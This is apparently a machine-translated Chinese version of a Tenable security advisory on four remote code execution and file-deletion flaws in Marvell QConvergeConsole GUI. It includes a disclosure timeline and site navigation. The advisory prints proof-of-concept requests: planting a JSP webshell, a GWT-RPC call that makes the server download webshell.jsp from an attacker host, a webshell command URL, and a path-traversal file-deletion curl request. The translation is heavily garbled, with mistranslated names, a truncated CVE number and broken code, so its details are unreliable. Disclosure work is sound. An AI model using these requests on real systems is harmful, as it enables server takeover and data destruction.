Marvel QConserveGUI多重易变性

高位

可租制研究发现Marvel QConveConsoleGUI多重漏洞,产生自先前发布和补丁漏洞补丁不全

CVE-2020-15643:保存AsText目录远程代码执行易失
前次修复此脆弱点只检查路径遍历名参数不检查预版参数化
if验证者远程攻击者指定prePath="QCCAgentInstallers",name="webshell.jsp"并数据=中,saveAsText方法将在QCCGentInstallers网络应用上下文路径中创建恶意webshell
攻击者然后可以向JSPwebshell发送命令,JSPwebshell运行系统或root账号安全上下文

见概念证明GitHub上.

CVE-2020-1564:setAppFileBytes目录远程代码执行脆弱性
前次修复此脆弱点只检查路径遍历名参数不检查Path前参数
if验证者远程攻击者指定prePath="QCCAgentInstallers",name="webshell.jsp",iType=4,数据=并imode=1中,集AppFileBytes方法将在QCCGentInstallers网络应用上下文路径中创建恶意webshell
攻击者然后可以向JSPwebshell发送命令,JSPwebshell运行系统或root账号安全上下文

见概念证明Github上

CVE-2020-15645:获取FileFromURL不受限制文件上传远程代码执行脆弱性
前一修复似乎有逻辑错误意图似乎是限制文件下载 URL下载.qlogic.com, 反之则相反(限制下载 URL内含下载.qlogic.com)。

公共同步字符串获取FileurLif (urlString.contains("download.qlogic.com")){troy.warn(“getFileFromURL:似然URL名称跳转操作”)回报[.]

认证远程攻击者可上传恶意JSP文件并按系统或root执行

JSP weshell#2运行网站主机服务JSPweshellroot@host:/tm#python3-m3号指令QCC主机从攻击者主机下载JSPweshell#JSPweshell
              
               HContent-Type文本/xgwt-rpc字符集=UTF-8-Hx-GWT-ermplation:deadbeef-d7+0+7
               
                :8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|getFileFromURL|java.lang.String/2004016611|Z|http://
                
                 :8000/webshell.jsp|1|2|3|4|2|5|6|7|0|' http://
                 
                  8080/QConvecleConsole/com.qlogic.qms.hba.gwt.Mein/gwttestservice#4
                  
                   网站#
                   
                    :8080/QConvergeConsole/webshell.jsp?cmd=whoami
                    
                     
                     
                    
                    命令:whoami
unt权限系统

CVE-2020-5803:删除AppFile验证路径转换文件删除

删除AppFile方法GWTTestServiceImpl类缺乏用户提供路径前用于文件删除操作的适当验证。经认证远程攻击者可利用此漏洞删除随机远程文件系统或root

Curl-si-cookie 'JSSSIEID=
                
                 '\
                 
HCente-Type文本/xgwt-rpc字符集=UTF8
                 
HXGWT变换:死比夫
                 
7+0+8
                 
                  :8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|deleteAppFile|java.lang.String/2004016611|I||../../../../../../../../../
                  
                   23356788
                   
http://
                   
                    :8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice

9月17日,2020-marvell网络表格请求直接安全联系电子邮件地址和PGP密钥

9月18日,2020-Marvel回复请求更多细节,提供PGP密钥

9月18日,2020-附设漏洞细节/披露

9月23日, 2020-可开机查看销售商是否收到/解密漏洞细节

9月24日,2020-Marvel响应请求更多时间披露

9月24日,2020-可租响应表示将按计划发布

9月24日,2020-Marvel通知Tenable公司正在开发软件发布更新

10月6日 2020-Marvel提供Tenable测试固定版

10月8日 2020-备注修复不完全

11月6日-2020-Marvel注解

2020年12月17日-90天CVE-2020-5803发布日期

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

CVE识别码 CVE-2020-15643
CVE-2020-1564
CVE-2020-15645
CVE-2020-5803

可租咨询ID

TRA-2020-56

sv2基础/时间评分

9.0

sv2向量

AV:N/AC:L/Au:S/C:C/I:C/A:C

sv3基础/时间评分

8.8

CVSSv3向量

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

受影响产品

Marvel QConserveGUI5.5.0.74版

风险因子

高位

产品类

商务需求

产业界

遵章性

m透视

研究

特征Webinar

寻找伙伴

可租保证伙伴

技术伙伴

支持

服务类

联系专业服务

关于我们

新闻事件

特征Webinar

探索网络接触

Marvel QConserveGUI多重易变性

简表

求解

附加引用

披露时间线

风险信息

咨询时间线

Marvel QConserveGUI多重易变性

简表

求解

附加引用

披露时间线

风险信息

咨询时间线

可耐受脆弱性管理

可耐受脆弱性管理

感恩节

试可穿Nessus专业免费

New-Nessus专家现可用

可买Nessus专业

选择您的许可

感恩节

可租WebApp扫描试

可租WebApp扫描

感恩节

试可腾鲁明

可买路明

感恩节

请求演示可租安全中心

请求演示TenableOT安全

请求演示可租身份接触

试可耐云安全

联系人a购买可租云安全

感恩节

看吧可租一号内行动

可点攻面管理操作

感恩节

试可耐奈苏斯专家免费

买可租Nessus专家

选择您的许可

试Nessus免费专家

买可租Nessus专家

选择您的许可

New-Nessus专家
现可用

看吧
可租一号
内行动